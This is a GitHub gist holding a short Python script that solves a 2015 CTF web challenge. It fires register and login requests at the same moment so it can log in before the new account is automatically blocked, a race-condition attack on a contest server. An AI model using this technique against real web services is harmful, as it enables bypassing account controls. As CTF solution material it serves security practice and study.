Skip to content

Instantly share code, notes, and snippets.

@mrexcessive

mrexcessive/pwn.py

Created October 4, 2015 17:01
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mrexcessive/26ce8d9c3841d870975d to your computer and use it in GitHub Desktop.
Save mrexcessive/26ce8d9c3841d870975d to your computer and use it in GitHub Desktop.
Download ZIP
Exploit register and login web service using timing attack for DCTFU CTF 2015 web 300 challenge
Raw
pwn.py
#!/usr/bin/python
#See article on https://whitehatters.academy/
#target server http:10.13.37.4 (on VPN for DCTFU 2015 quals CTF)
import requests # see http://stackoverflow.com/questions/4476373/simple-url-get-post-function-in-python
import multiprocessing # see http://stackoverflow.com/questions/6286235/multiple-threads-in-python
# we need to run register.php and login.php at the same time
baseurl = "http://10.13.37.4/"
username = "blobbyD"
password = "goblob"
md5pwd = "476b56907764207c05e118caaf9f9d96" # need this to register, is md5sum of the goblob password
# then need to fire up register, fire up login immediately
# capture output from both
def DoRegister():
url = baseurl + "register.php"
payload = {'username' : username, 'password' : md5pwd}
r = requests.post(url, data=payload)
print "REGISTER:[%s]" % r.text
def DoLogin():
url = baseurl + "login.php"
payload = {'username' : username, 'password' : password}
r = requests.post(url, data=payload)
print "LOGIN:[%s]" % r.text
if __name__ == "__main__":
if False:
DoRegister()
DoLogin()
SEQUENTIAL_FAILS="""
REGISTER:[ <h2>Congrats! Login now!</h2>
]
LOGIN:[ <h1>Logged in as </h1>Your user was automatically blocked]
"""
if True: # simultaneous - timing attack
processRegister = multiprocessing.Process(target=DoRegister)
processDoLogin = multiprocessing.Process(target=DoLogin)
processRegister.start()
processDoLogin.start()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment